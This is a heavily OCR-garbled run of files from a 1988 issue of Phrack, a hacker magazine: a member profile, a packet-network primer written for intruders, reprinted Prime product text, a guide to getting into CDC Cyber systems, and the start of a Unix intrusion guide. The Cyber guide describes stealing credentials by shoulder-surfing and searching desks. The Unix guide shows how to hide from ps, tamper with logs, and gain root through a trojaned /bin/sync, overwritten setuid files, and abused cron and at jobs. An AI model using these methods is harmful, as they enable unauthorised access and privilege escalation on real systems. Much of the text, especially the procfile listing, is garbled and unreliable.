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==Phrack Ine.== 
Volume Two, Issue 18, Phile #2 of 11 
==Phrack Pro-Phile XI== 
Written and Created by Crimson Death 
Welcome to Phrack Pro-Phile XI. Phrack Pro-Phile is created to bring info 
to you, the users, about old or highly important/controversial people. This 


month, I bring to you a name familiar to most in the BBS world... 


Ax Murderer 


Ax Murderer is popular to many of stronger names in the P/H community. 


Personal 
Handle: Ax Murderer 
Call him: Mike 
Past handles: None 
Handle origin: Thought of it while on CompuServe. 


Date of Birth: 10/04/72 
Age at current date: 15 
Height: 6’ 27’ 
Weight: 205 Lbs. 
Eye color: Brown 
Hair Color: Brown 
Computers: IBM PC, Apple II+, Apple IIe 
Sysop/Co-Sysop of: The Outlet Private, Red-Sector-A, The Autobahn 


Ax Murderer started phreaking and hacking in 1983 through the help of some 
of his friends. Members of the Hack/Phreak world which he has met include 
Control C, Bad Subscript, The Timelord. Some of the memorable phreak/hack 
BBS’s he was/is on included WOPR, OSUNY, Plovernet, Pirate 80, Shadow Spawn, 
Metal Shop Private, Sherwood Forest (213), IROC, Dragon Fire, and Shadowland. 
His phreaking and hacking knowledge came about with a group of people in which 
some included Forest Ranger and The Timelord. 


Ax Murderer is a little more interested in Phreaking than hacking. He 
does like to program however, he can program in ’C’, Basic, Pascal, and 
Machine Language. 


The only group in which Ax Murderer has been in is Phoneline Phantoms. 


Interests: Telecommunications (Modeming, phreaking, hacking, 
programming), football, track, cars, and music. 


Ax Murderer’s Favorite Thing 


His car... (A Buick Grand National) 
His gilrfriend... (Sue) 
Rock Music 


Most Memorable Experiences 


Newsweek Incident with Richard Sandza (He was the Judge for the tele-trial) 


Some People to Mention 


Forest Ranger (For introducing me to everyone and getting me on Dragon Fire) 
Taran King (For giving me a chance on MSP and the P/H world) 
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Mind Bender (For having ANY utilities I ever needed) 
The Necromancer (Getting me my Apple’cat) 
The Titan (Helping me program the BBS) 


All for being friends and all around good people and phreaks. 


Ax Murderer is out and out against the idea of the destruction of data. 
He hated the incident with MIT where the hackers were just hacking it to 
destroy files on the system. He says that it ruins it for th veryon ls 
and gives /True Hackers’ a bad name. He hates it when people hack to destroy, 
Ax has no respect for anyone who does this today. Where have all the good 
times gone? 


I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming 
in the near future.... And now for the regularly taken poll from all 
interviewees. 


Of the general population of phreaks you have met, would you consider most 
phreaks, if any, to be computer geeks? "No, not really." Thanks Mike. 


Crimson Death 
Sysop of The Forgotten Realm 
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==Phrack Inc.== 


Volume Two, Issue 18, Phile #3 of 11 


-_- -_- An Introduction To An es 


Pa eine a Packet Switched Networks a 


-_-_-_- Written By - Revised 


-_-- - Epsilon 05/3/88 —- - - 


In the past few years, Packet Switched Networks have become a prominent 
feature in the world of telecommunications. These networks have provided ways 
of communicating with virtually error-free data, over very large distances. 
These networks have become an imperative to many a corporation in the business 
world. In this file we will review some of the basic aspects of Packet 
Switched Networks. 


Advantages — 
The Packet Switched Network has many advantages to the common user, and 
even more to the hacker, which will be reviewed in the next topic. 


The basis of a Packet Switched Network is the Packet Switch. This network 
nables the service user to connect to any number of hosts via a local POTS 
dial-up/port. The various hosts pay to be connected to this type of network, 
and that’s why there is often a surcharge for connection to larger public 
services like Compuserve or The Source. 


A Packet Switched Network provides efficient data transfer and lower rates 
than normal circuit switched calls, which can be a great convenience if you 
are planning to do a lot of transferring of files between you and the host. 


Not only is the communication efficient, it is virtually error free. 
Whereas in normal circuit switched calls, there could be a drastic increase in 
errors, thus creating a bad transfer of data. 


When using a Packet Switched Network, it is not important that you 
communicate at the same baud rate as your host. A special device regulates 
the speed so that the individual packets are sped up or slowed down, according 
to your equipment. Such a device is called a PAD (Packet Assembler 
Disassembler). 


A PSN also provides access to a variety of information and news retrieval 
services. The user pays nothing for these calls, because the connections are 
collect. Although the user may have to subscribe to the service to take 
advantage of it’s services, the connection is usually free, except for a 
surcharge on some of the larger subscription services. 


Advantages To Hackers - 

Packet Switched Networks, to me, are the best thing to come along since the 
phone system. I’m sure many other hackers feel the same way. One of the 
reasons for this opinion is that when hacking a system, you need not dial out 
of your LATA, using codes or otherwise. 


Now, the hacker no longer has to figure out what parameters he has to set 
his equipment to, to communicate with a target computer effectively. All 
PSSes use the same protocol, set by international standards. This protocol is 
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called X.25. This protocol is used on every network-to-network call in the 
world. 


When operating on a packet switch, you are not only limited to your own 
network (As if that wasn’t enough already). You can access other PSSes or 
private data networks through gateways which are implemented in your PSN. 
There are gateways to virtually every network, from virtually every other 
network, except for extremely sensitive or private networks, in which case 
would probably be completely isolated from remote access. 


Another advantage with PSNs is that almost everyone has a local port, which 
means if you have an outdial (Next paragraph), you can access regular circuit 
switched hosts via your local Packet Switched Network port. Since the ports 
are local, you can spend as much time as you want on it for absolutely no 
cost. So think about it. Access to any feasible network, including overseas 
PSNs and packet switches, access to almost any host, access to normal circuit 
switched telephone-reachable hosts via an outdial, and with an NUI (Network 
User Identity - Login and password entered at the @ prompt on Telenet), 
unlimited access to any NUA, reverse-charged or not. 


Due to the recent abuse of long distance companies, the use of codes when 
making free calls is getting to be more and more hazardous. You may ask, ‘Is 
there any resort to making free calls without using codes, and without using a 
blue box?’ The answer is yes, but only when using data. With an outdial, 
accessible from your local PSN port, you can make data calls with a remote 
modem, almost always connected directly to a server, or a port selector. This 
method of communicating is more efficient, safer, and more reliable than using 
any code. Besides, with the implementation of equal access, and the 
elimination of 950 ports, what choice will you have? 


Some Important Networks - 


As aforementioned, PSNs are not only used in the United States. They are 
all over the place. In Europe, Asia, Canada, Africa, etc. This is a small 
summary of some of the more popular PSNs around the world. 


Country Network Name *DNIC 
Germany Datex-P 2624 
Canada Datapac 3020 
Italy Datex-P 0222 
South Africa Saponet 0655 
Japan Venus-P 4408 
England Janet/PSS 2342 
USA Tymnet 3106 
USA Telenet 3110 
USA Autonet 3126 
USA RCA 314.3 
Australia Austpac 0505 
Ireland Irepac 2724 
Luxembourg Luxpac 2704 
Singapore Telepac 5252 
France Transpac 2080 
Switzerland Telepac 2284 
Sweden Telepac 2405 
Israel Isranet 4251 


* — DNIC (Data Network Identification Code) 
Precede DNIC and logical address with a 
‘0’ when using Telenet. 


Notes On Above Networks - 


Some countries may have more than one Packet Switching Network. The ones 
listed are the more significant networks for each country. For example, the 
United States has eleven public Packet Switching Networks, but the four I 
listed are the major ones. 
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Several countries may also share one network, as shown above. Each country 
will have equal access to the network using the basic POTS dial-up ports. 


Focus On Telenet — 


Since Telenet is one of the most famous, and highly used PSNs in the United 
States, I thought that informing you of some of the more interesting aspects 
of this network would be beneficial. 


Interconnections With Other Network Types - 


Packet Switched Networks are not the only type of networks which connect a 
large capacity of hosts together. There are also Wide Area Networks, which 
operate on a continuous link basis, rather than a packet switched basis. 
These networks do not use the standardized X.25 protocol, and can only be 
reached by direct dial-ups, or by connecting to a host which has network 
access permissions. The point is, that if you wanted to reach, say, Arpanet 
from Telenet, you would have to have access to a host which is connected to 
both networks. This way, you can connect to the target host computer via 
Telenet, and use the WAN via the target host. 


WANs aren’t the only other networks you can access. Also, connections to 
other small, private, interoffice LANs are quite common and quite feasible. 


Connections To International NUAs via NUIs - 


When using an NUI, at the prompt, type O+DNIC+NUA. After your connection 
is established, proceed to use the system you’ve reached. 


Private Data Networks - 


Within the large Packet Switched Networks that are accessible to us there 
are also smaller private networks. These networks can sometimes be very 
interesting as they may contain many different systems. A way to identify a 
private network is by looking at the three digit prefix. Most prefixes 
accessible by Telenet are based on area codes. Private networks often have a 
prefix that has nothing to do with any area code. (Ex. 322, 421, 224, 144) 
Those prefixes are not real networks, just examples. 


Inside these private networks, there are often smaller networks which are 
connected with some type of host selector or gateway server. If you find 
something like this, there may be hosts that can be accessed only by this port 
selector/server, and not by the normal prefix. It is best to find out what 
these other addresses translate to, in case you are not able to access the 
server for some reason. That way, you always have a backup method of reaching 
the target system (Usually the addresses that are accessed by a gateway 
server/port selector translate to normal NUAs accessible from your Telenet 
port). 


When exploring a private network, keep in mind that since these networks 
are smaller, they would most likely be watched more closely during business 
hours then say Telenet or Tymnet. Try to keep your scanning and tinkering 
down to a minimum on business hours to avoid any unnecessary trouble. 
Remember, things tend to last longer if you don’t abuse the hell out of them. 


Summary — 


I hope this file helped you out a bit, and at least gave you a general idea 
of what PSNs are used for, and some of the advantages of using these networks. 
If you can find something interesting during your explorations of PSNs, or 
Private Data Networks, share it, and spread the knowledge around. Definitely 
exploit what you’ve found, and use it to your advantage, but don’t abuse it. 


If you have any questions or comments, you reach me on - 


The FreeWorld II/Central Office/Forgotten Realm/TOP. 
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I hope you enjoyed my file. Thanks for your time. I should be writing a 
follow up article to this one as soon as I can. Stay safe.. 
— Epsilon 
—- Thanks To - 


Prime Suspect/Sir Qix/The Technic/Empty Promise/The Leftist 
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==Phrack Inc.== 


Volume Two, Issue 18, Phile #4 of 11 


- PRIMOS: = 
= NETWORK COMMUNICATIONS = 
- PRIMENET, RJE, DPTX - 
— Presented by Magic Hasan June 1988 - 


PRIME’s uniform operating system, PRIMOS, supports a wide range of 
communications products to suit any distributed processing need. The PRIMENET 
distributed networking facility provides complete local and remote network 
communication services for all PRIME systems. PRIME’s Remote Job Entry (RJ 
products enable multi-user PRIME systems to emulate IBM, CDC, Univac, 
Honeywell and ICL remote job entry terminals over synchronous communication 
lines. PRIME’s Distributed Processing Terminal Executive (DPTX) allows users 
to construct communication networks with PRIME and IBM-compatible equipment. 


GI 
~~ 


PRIMENET provides complete local and remote network communication services 
for all PRIME systems. PRIMENET networking software lets a user or process on 
one PRIME system communicate with any other PRIME system in the network 
without concern for any protocol details. A user can log in to any computer 
in the network from any terminal in the network. With PRIMENET, networking 
software processes running concurrently on different systems can communicate 
interactively. PRIMENET allows transparent access to any system in the 


network without burdening the user with extra commands. 


PRIMENET has been designed and implemented so that user interface is simple 
and transparent. Running on a remote system from a local node of the network 
or accessing remote files requires no reprogramming of user applications or 

xtensive user training. All the intricacies and communication protocols of 
the network are handled by the PRIMENET software. For both the local and 
remote networks, PRIMENET will allow users to share documents, files, and 
programs and use any disk or printer configured in the network. 


Ju. 


For a local network between physically adjacent systems, PRIME offers the 
high-performance microprocessor, the PRIMENET Node Controller (PNC). The 
controller users direct memory access for low overhead and allows loosely 
coupled nodes to share resources in an efficient manner. The PNCs for each 
system are connected to each other with a coaxial cable to form a high-speed 
ring network, with up to 750 feet (230 meters) between any two systems. 


Any system in the PNC ring can establish virtual circuits with any other 
system, making PNC-based networks "fully connected" with a direct path between 
each pair of systems. The ring has sufficient bandwidth (1 MB per second) and 
addressing capability to accommodate over 200 systems in a ring structure; 
however, PRIMENET currently supports up to sixteen systems on a ring to 
operate as a single local network. 


The PRIMENET Node Controller is designed to assure continuity of operation 
in the event that one of the systems fails. One system can be removed from 
the network or restored to on-line status without disturbing the operations of 
the other system. An active node is unaware of messages destined for other 
nodes in the network, and the CPU is notified only when a message for that 
node has been correctly received. 


Synchronous communications over dedicated leased lines or dial-up lines is 
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1) The User does not need to understand the detailed 
mechanisms of communications software in order to 
communicate. 

2) Calls are device-independent. The same program will 
work over physical links implemented by the local node 
controller (local network), leased lines, or a packet 
network. 

3) Programs on one system can concurrently communicate 
with programs on other systems using a single 
communications controller. PRIMENET handles all 
multiplexing of communications facilities. 

4) A single program can establish multiple virtual 
circuits to other programs in the network. 

PRIMENET’s ITS facility allows an interactive terminal to have access to 
any machine in the network. This means that terminals can be connected into 
an X.25 packet network along with PRIME computers. Terminal traffic between 
two systems is multiplexed over the same physical facilities as inter-program 


data, so 


This feature is ordinarily invisible to user programs, 


no additional hardware is needed to share terminals between systems. 


which cannot 


distinguish data entering via a packet network from data coming in over AMLC 
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lines. A variant of the IPCF facility allows users to include the terminal 
handling protocol code in their own virtual space, thus enabling them to 
control multiple terminals on the packet network within one program. 

Terminals entering PRIMOS in this fashion do not pass through the usual log-in 
facility, but are immediately connected to the application program they 
request. (The application program provides whatever security checking is 
required.) 


The result is the most effective available means to provide multi-system 
access to a single terminal, with much lower costs for data communications and 
a network which is truly available to all users without the expense of 
building a complicated private network of multiplexors and concentrators. 


By utilizing PRIMENET’s File Access Manager (FAM), programs running under 
PRIMOS can access files on other PRIME systems using the same mechanisms used 
to access local files. This feature allows users to move from a single-system 
environment to a multiple-system one without difficulty. When a program and 
the files it uses are separated into two (or more) systems the File Access 
Management (FAM)is automatically called upon whenever the program attempts to 
use the file. Remote file operations are logically transparent to the user 
or program. 


When a request to locate a file or directory cannot be satisfied locally, 
the File Access Manager is invoked to find the data elsewhere in the network. 
PRIMOS initiates a remote procedure call to the remote system and suspends the 


user. This procedure call is received by an answering slave process on the 
remote system, which performs the requested operation and returns data via 
subroutine parameters. The slave process on the remote system is dedicated to 
its calling master process (user) on the local system until released. A 


master process (user) can have a slave process on each of several remot 
systems simultaneously. This means that each user has a dedicated connection 
for the duration of the remote access activity so many requests can be 
handled in parallel. 


FAM operation is independent of the specific network hardware connecting 
the nodes. There is no need to rewrite programs or learn new commands when 
moving to the network environment. Furthermore, the user need only be 
logged-in to one system in the network, regardless of the location of the 
file. Files on the local system or remote systems can be accessed dynamically 
by file name within a program, using the language-specific open and close 
statements. No external job control language statements are needed for the 
program to access files. Inter-host file transfers and editing can be 
performed using the same PRIMOS utilities within the local system by 
referencing the remote files with their actual file names. 


REMOTE JOB ENTRY 


PRIME’s Remote Job Entry (RJE) software enables a PRIME system to emulat 
IBM, CDC, Univac, Honeywell and ICL remote job entry terminals over 
synchronous communication lines. PRIME’s RJE provides the same communications 
and peripheral support as the RJE terminals they emulate, appearing to the 
host processor to be those terminals. All PRIME RJE products provide three 
unique benefits:\024 


* PRIME RJE is designed to communicate with multiple 
remote sites simultaneously. 


= 


* PRIME RJE enables any terminal connected to a PRIME system to 
submit jobs for transmission to remote processors, eliminating the 


requirement for dedicated terminals or RJE stations at each 
location. 


* PRIME’s mainframe capabilities permit concurrent running of RJE 
emulators, program development and production work. 


PRIME’s RJE supports half-duplex, point-to-point, synchronous 
communications and operates over dial-up and dedicated lines. It is fully 
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DISTRIBUTED PROCESSING TERMINAL 


EXECUTIVE (DPTX) 


PRIME’s Distributed Processing Terminal Executive (DPTX) allows users to 


_ 


construct communication networks with PRIME and IBM-compatible equipment. 

DPTX conforms to IBM 3271/3277 Display System protocols, and can be integrated 
into networks containing IBM mainframes, terminals and printers without 
changing application code or access methods and operates under the PRIMOS 


operating system. 


DPTX is compatible with all IBM 370 systems and a variety of access methods 


and teleprocessing monitors: BTAM, TCAM, VTAM, 
provide transmission speeds up to 9600 bps using 
Communications (BSC) protocol. 


IMS/VS, CIC/VS, and TSO. They 


IBM’s Binary Synchronous 


DPTX is comprised of three software modules that allow PRIME systems to 
emulate and support IBM or IBM compatible 3271/3277 Display Systems. One 
module, Data Stream Compatibility (DPTX/DSC), allows the PRIME system to 

mulate the operation of a 3271 on the IBM system. This enables both terminal 
user and application programs (interactive or batch) on the PRIME System to 


reach application programs on an IBM mainframe. 


A second module, Terminal 


Support Facility (DPTX/TSF), allows a PRIME system to control a network of IBM 
3271/3277 devices. This enables terminal users to reach application programs 


on a PRIME computer. The third module, 


[Transparent Connect Facility 


(DPTX/TCF), combines the functions of modules one and two with additional 
software allowing 3277 terminal users to to reach programs on a IBM mainframe, 


even though the terminal subsystem is physically 
which is connected to an IBM system. 


= 


connected to a PRIME system, 


PRIMOS offers a variety of different Communication applications. Being 
able to utilize these applications to their fullest extent can make life easy 


for a Primos "enthusiast." If you’re a beginner 


with Primos, the best way to 


learn more, as with any other system, is to get some "hands-on" experienc 
Look forward to seeing some beginner PRIMOS files in the near future. -—MH 


a 


Special thanks to PRIME INC. for unwittingly providing the text for this 


article. 
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==Phrack Inc.== 


Volume Two, Issue 18, Phile #5 of 11 


-= Hacking Control Data Corporation’s Cyber =- 


-= Written by Phrozen Ghost, April 23, 1988 =— 


-= Exclusively for Phrack Magazine == 


This article will cover getting into and using NOS (Networking Operating 
System) version 2.5.2 running on a Cyber 730 computer. Cybers generally run 
this operating system so I will just refer to this environ- ment as Cyber. 
Also, Cyber is a slow and outdated operating system that is primarily used 
only for college campuses for running compilers. First off after you have 
scanned a bunch of carriers you will need to know how Cyber identifies itself. 
It goes like this: 


WELCOME TO THE NOS SOFTWARE SYSTEM. 
COPYRIGHT CONTROL DATA 1978, 1987. 


88/02/16. 02.36.53. N265100 
CSUS CYBER 170-730. NOS 2.5.2-678/3. 
FAMILY: 


You would normally just hit return at the family prompt. Next prompt is: 


USER NAME: 


Usernames are in the format abcdxxx where a is the location of where the 


account is being used from (A-Z). the b is a grouping specifying privs and 
limits for the account- usually A-G -where A is the lowest access. Some 
examples of how they would be used in a college system: 

A = lowest access - class accounts for students 

B = slightly higher than A (for students working on large projects) 


C = Much higher limits, these accounts are usually not too hard to get and 


they will normally last a long time! Lab assistants use these. 
D = Instructors, Lecturers, Professors... etc.. 
E = same... (very hard to get these!) 


The C and D positions are usually constant according to the groupings. 
For example, a class would have accounts ranging from NADRAAA-AZZ 


AKRR AAA 


These can also be digits 


There are also special operator accounts which start with digits instead of 
numbers. (ie 7ETPDOC) These accounts can run programs such as the monitor 
which can observe any tty connected to the system... 


The next prompt will be for the password, student account passwords cannot be 
changed and are 7 random letters by default, other account passwords can be 
changed. You get 3 tries until you are logged out. It is very difficult if 
not impossible to use a brute force hacker or try to guess someone’s account... 
so how do you get on? Here’s one easy way... Go down to your local college 
(make sure they have a Cyber computer!) then just buy a class catalog (they 
only cost around 50 cents) or you could look, borrow, steal someone else’s... 
then find a pascal or fortran class that fits your schedule! You will only 
have to attend the class 3 or 4 times max. Once you get there you should have 
no trouble, but if the instructor asks you questions about why you are not on 
the roll, just tell him that you are auditing the class (taking it without 
enrolling so it won’t affect your GPA). The instructor will usually pass out 
accounts on the 3rd or 4th day of class.. this method also works well with 
just about any system they have on campus! Another way to get accounts is to 
go down to the computer lab and start snooping! Look over someone’s shoulder 
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while they type in their password, or look thru someone’s papers while they’re 
in the bathroom, or look thru the assistants desk while he is helping 
someone... (I have acquired accounts both ways, and the first way is a lot 
easier with less hassles) Also, you can use commas instead of returns when 
entering username and password. 
Example: at the family prompt, you could type ,nadrajf,dsfgkcd 

or at the username prompt nadrajf,dsfgkcd 


After you enter your info, the system will respond with: 


JSN: APXV, NAMIAF 
/ 


The ’APXV, NAMIAF’ could be different depending on what job you were attached 
to. The help program looks a lot neater if you have vt100 emulation, if you 
do, type [screen,vt100] (don’t type the brackets! from now on, all commands I 
refer to will be enclosed in brackets) Then type help for an extensive 
tutorial or a list of commands. Your best bet at this point is to buy a quick 
reference guide at the campus because I am only going to describe the most 
useful commands. The / means you are in the batch subsystem, there are usually 
6 or 7 other subsystems like basic, fortran, etc... return to batch mode by 
typing [batch]. 


Some useful commands: 


CATLIST - will show permanent files in your directory. 

ENQUIRE,F - displays temporary files in your workspace. 

LIMITS - displays your privileges. 

INFO get more on-line help. 

R xr xecute last command. 

GET, fn - loads fn into the local file area. 

CHANGE —- change certain specs on a file. 

PERMIT - allow other users to use one of your files. 

REWIND, * —- rewinds all your local files. 

NEW, fn creates new fil 

PURGE deletes files. 

LIST,F=fn - list file. 

UPROC - create an auto-execute procedure fil 

AIL send/receive private mail. 

BYE - logoff. 
Use the [helpme,cmd] command for the exact syntax and parameters of these 
commands. There are also several machine specific ’application’ programs such 


as pascal, fortran, spitbol, millions of others that you can look up with the 
INFO command... there are also the text editors; edit, xedit, and fse (full 
screen editor). Xedit is the easiest to use if you are not at a Telray 1061 
terminal and it has full documentation. Simply type [xedit,fn] to edit the 
Pike tr. 


Special control characters used with Cyber: 


Control S and Control Q work normally, the terminate character is Control T 
followed by a carriage return. If you wanted to break out of an auto-execute 
login program, you would have to hit *T C/R very fast and repetitively in 
order to break into the batch subsystem. Control Z is used to set environment 
variables and execute special low level commands, example: [*Z TM C/R] this 
will terminate your connection... 


So now you’re thinking, what the hell is Cyber good for? Well, they won’t 
have any phone company records, and you can’t get credit information from one, 
and I am not going to tell you how to crash it since crashing systems is a 
sin. There are uses for a Cyber though, one handy use is to set up a chat 
system, as there are normally 30-40 lines going into a large university Cyber 
system. I have the source for a chat program called the communicator that I 
will be releasing soon. Another use is some kind of underground information 
exchange that people frequently set up on other systems, this can easily be 
done with Cyber. 
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Procedure files: 


A procedure file is similar to a batch file for MS-DOS, and a shell script for 
UNIX. You can make a procedure file auto-execute by using the UPROC command 


like [uproc,auto] will make the file ‘auto’, auto execute. There is alsoa 
special procedure file called the procfile in which any procedure may be 
accessed by simply a - in front of it. If your procfile read: 

-proc,cn. 


-* sample procedure 
Scatlist/un=7etpdoc. 
Sexit. 


then you could simply type -cn and the / prompt and it would execute the 
catlist command. Now back to uprocs, you could easily write a whole BBS ina 
procedure file or say you wanted to run a chat system and you did not want 
people to change the password on your account, you could do this: 


-proc, chat, 


PW"Password: "=(*A). 
Sife,PW="cyber",yes. 
Schat. 
Srevert. 
Sbye. 


Selse,yes. 
Snote./Wrong password, try again/. 
Srevert. 
Sbye. 

Sendif,yes. 


This procedure will ask the user for a password and if he doesn’t type "cyber" 
he will be logged off. If he does get it right then he will be dumped into 
the chat program and as soon as he exits the chat program, he will be logged 
off. This way, the user cannot get into the batch subsystem and change your 
password or otherwise screw around with the account. The following is a 
listing of the procfil that I use on my local system, it has a lot of handy 
utilities and examples... 


ss] Gut here sss 


-PROC,B. 
KKK KKBYR KKK KKK 
DAYFILE 


NOTE. ///I////IIITIIIIIIILIILT I 
Tes 6 


Cc 

BYE. 

REVERT, NOLIST. 
EOR 

.PROC, TIME. 
.******GIVES DAY AND TIME****** 
NOTE./THE CURRENT DAY AND TIME IS/ 
IND, CLOCK. / 

EVERT, NOLIST. 


(e) 
w 


ROC, SIGN*I, IN. 
*****STGN PRINT UTILITY******, 
,IN. 


IND, SIGN, #I=IN, #L=OUT. 
E./TO PRINT, TYPE: PRINT, OUT, CC, RPS=??/ 
EVERT,NOLIST. 


(eo) 
ve) 


ROC, TA. 
KKKKKTA Kx xxKKKK 
CFIND, AID, COMM. 
EVERT, NOLIST. 
R 


$ 
$ 
# 


. oe HOM MM + 
vAwDwM + Uw Ss WTO *Uwm Wy 


ROC, DIR, UN=,FILE=. 
_******DIRECTORY LISTING OF PERMANENT FILES****** 
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ET (ZZZZDIR=CAT/#UN=LGTLOCL) 


ZZZZDIR(FILE, #UN=UN) 


Hh UP + Hh UP + 


+OrnuMMnHMN: + UW Ws 


— FON MO NN = 
UADAMWDOQD *+UAWDaE 


+ WM 


. . . . . +N Ms - . 
DOQOPrQ *+VUTHADAN*+VHADA ANAWDOQA+DVADSH +VADSHN+AVDADSZHN +UAWDD 


+ WM 


ATLIST. 


> 
=| 


ETURN (ZZZZDIR) 
EVERT, NOLIST. 


‘EN TO Z1LQEKKKK 


OQ *RO 
* 
f+ 
* | + 
* 
n 
| 
n 
Q 
vs) 


TE. /SCREEN, 219. 


5 


KKKKSORT SCR 
REEN, VT100. 
‘EN, VT100. 
VERT, NOLIST 

R 


EN TO VI1O00****** 


[e) 
4 

74 
aay 
n 
Q 
ve) 


EN TO T10****** 


ON *RDOE 
* 
“He + 
. ws 
* 
n 
HA 
n 
Q 
ve) 


OF 
Bw 


ROC,C. 


AKKAKKCATLIST****** 


EVERT,NOLIST. 


(eo) 
yD 


ROC, CA. 
*xXX*X*XCATLIST, LO=F****** 
LIST, LO=F. 
ERT,NOLIST. 


< 


ROC, MT. 


KKKKKBBGKKKKKK 


ACFIND,AID,MTAB. 


EVERT, NOLIST. 
R 
ROC, LT, FILE=, 
KKKKKTTST FILE****x** 
ET, FILE. 

Serr. 
PY (FILE) 
EVER 


(e) 


) 


ET (QQOF LLE=ENQF/UN=1GTLOCL) 


[ (NORMAL) 
ERT,NOLIST. WHERE IS THAT FILE?? 


C, LOCAL. 
*****XDTRECTORY OF LOCAL FILES****** 
TURN (PROCLIB, YYYYBAD, YYYYPRC) 


ILE. 


ERT,NOLIST. 


X 


* 


F 
V 
I 
VERT. FILES ERROR 
R 
O 


C,RL. 


*****RATSE LIMITS****** 


$SETASL (*) 


$ 


S) 


ETISL(*) 


SSETTL(*) 


SCSI 
SNOTE./ Limits now at max validated levels. 
CSET (NORMAL) 


$ 
$ 
# 


E 


[T (ASCIT) 


R 


EVERT,NOLIST. 


HO. EE] 


OR 


ROC, CL. 
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a KxkKkKK*K*XCLEAR****** 

SCLEAR, *. 
SCSET (ASCIT) 
SNOTE./LOCAL FILE AREA CLEARED 
EVERT, NOLIST. 
R 
ROC, P, FILE=THING, LST=LIST. 
* 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK KKK 


(e) 


1 
[tT] 
> 
ve) 


ASCAL4, FILE, LST. 


wn 
i 

> 
n 
Q 
Hi 
H 


$+tONUMMMNUMYNHNUMNYNs 


DPaAWDAQDA *+UVUADAZAQAD +10 e POQQDHAAVHAAQA*VEAD 


+e eR RAE DERE 
EWIND,*. 
SET (ASCIT) 
OTE. /REWOUND. 
EVERT,NOLIST. 
R 


+$+OM MMs 


ROC, FOR, FILE, LST=LIST. 
* 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


SET (ASCIT) 
VERT. Fortran Compiled 
a 


OPY (LST) 
EVERT. That’s all folks. 
R 


+tOUMMMMNUMNYHNUNNYN: 


ROC, WAR. 

**** KWARBLES****** 
ACFIND,AID,WAR. 
EVERT,NOLIST. 

R 
ROC,M. 
**** MATL /CHECK* * **** 
AAIL/CHECK. 
EVERT,NOLIST. 


e) 


HMMs + HMMs - 
*UMBaDE + VADN + VADOADE 


**X**X*XEPNTER MAIL****** 


+7 > 


PROC, HE, FILE=SUMPROC, UN=. 


*AKAKKHELP FILE* KEKE 


ERT,NOLIST. 


U B DHAWAN +t VAWDE 

Bs) 4 < 
[ 

Hi 

4 

oe 

HE 

ce 

T 

(as) 

Zz 


PROC, DYNAMO. 
_***KKKKWHO KNOWS? 2****** 
SGET, DYNMEXP/UN=7ETPDOC. 
SSKIPR, DYNME 
SCOPYBR, DYNM 
SFIND, DYNAMO, GO. 
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SREVERT,NOLIST. 

EOR 

EOR 

EOL 

Sse) Cub here: <== 

I have covered procfil’s fairly extensively as I think it is the most useful 
function of Cyber for hackers. I will be releasing source codes for several 
programs including ‘the communicator’ chat utility, and a BBS program with a 
full message base. If you have any questions about Cyber or you have gotten 
into one and don’t know what to do, I can be contacted at the Forgotten Real 
BBS or via UUCP mail at ...!uunet!ncoast!ghost. 


Phrozen Ghost 


m 
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==Phrack Inc.== 


Volume Two, Issue 18, Phile #6 of 11 


Unix for the Moderate 


By: The Urvile, Necron 99, and a host of me. 


Disclaimer: 


This is mainly for system five. I do reference BSD occasionally, but I 
mark those. All those little weird brands (i.e., DEC’s Ultrix, Xenix, and 
so on) can go to hell. 


Security: (Improving yours.) 


-Whenever logging onto a system, you should always do the following: 
S$ who -u 
S$ ps -ef 
S$ ps -u root 


or BSD: 

S who; w; ps uaxg 
This prints out who is on, who is active, what is going on presently, 
everything in the background, and so on. 


And the ever popular: 

S$ find / -name "*log*" -print 
This lists out all the files with the name ’log’ in it. If you do finda 
process that is logging what you do, or an odd log file, change it as soon 
as you can. 


If you think someone may be looking at you and you don’t want to leave 
(Useful for school computers) then go into something that allows shell 
breaks, or use redirection to your advantage: 

S cat < /etc/passwd 
That puts ’cat’ on the ps, not ’cat /etc/passwd’. 


If you’re running a setuid process, and don’t want it to show up on a ps 
(Not a very nice thing to have happen), then: 

S super_shell 

# exec sh 
Runs the setuid shell (super_shell) and puts something ‘over’ it. You may 
also want to run ’sh’ again if you are nervous, because if you break out of 
an exec’ed process, you die. Neat, huh? 


Improving your id: 


-First on, you should issue the command ‘id’ & it will tell you you your 
uid and euid. (BSD: whoami; >/tmp/xxxx;ls -l /tmp/xxxx will tell you your 
id [whoami] and your euid [ls -l].), terribly useful for checking on setuid 
programs to see if you have root euid privs. Also, do this: 

S$ find / -perm -4000 xec /bin/ls -lad {} ";" 
Yes, this finds and does an extended list of all the files that have the 
setuid bit on them, like /bin/login, /bin/passwd, and so on. If any of 
them look nonstandard, play with them, you never can tell what a *| will do 
to them sometimes. Also, if any are writeable and executable, copy sh over 
them, and you’ll have a setuid root shell. Just be sure to copy whatever 
was there back, otherwise your stay will probably be shortened a bit. 


-What, you have the bin passwd? 


Well, game over. You have control of the system. Everything in the bin 
directory is owned by bin (with the exception of a few things), so you can 
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modify them at will. Since cron executes a few programs as root every once 
in a while, such as /bin/sync, try this: 


main() 
{ 
if (getuid()==0 || getuid()==0) { 
system("cp /bin/sh /tmp/sroot"); 
system("chmod 4777 /tmp/sroot");  } 
sync(); 
} 
See .file.ic 
S cp /bin/sync /tmp/sync.old 
S$ mv a.out /bin/sync 
S$ rm file.c 


Now, aS soon as cron runs /bin/sync, you’ll have a setuid shell in 
/tmp/sroot. Feel free to hide it. 


-the ’at’ & 'cron’ commands: 


Look at the ‘at’ dir. Usually /usr/spool/cron/atjobs. If you can run ‘at’ 
(check by typing ’at’), and ’lasttimedone’ is writable, then: submit a 
blank ’at’ job, edit ’lastimedone’ to do what you want it to do, and move 
lasttimedone over your entry (like 88.00.00.00). Then the commands you put 
in lasttimedone will be ran as that file’s owner. Cron: in 
/usr/spool/cron/cronjobs, there are a list of people running cron jobs. 

Cat root’s, and see if he runs any of the programs owned by you (Without 
doing a su xxx -c "xxx"). For matter, check all the crons. If you can 
take one system login, you should be able to get the rest, in time. 


-The disk files. 


These are rather odd. If you have read permission on the disks in /dev, 
then you can read any file on the system. All you have to do is find it in 
there somewhere. If the disk is writeable, if you use /etc/fsbd, you can 
modify any file on the system into whatever you want, such as by changing 
the permissions on /bin/sh to 4555. Since this is pretty difficult to 
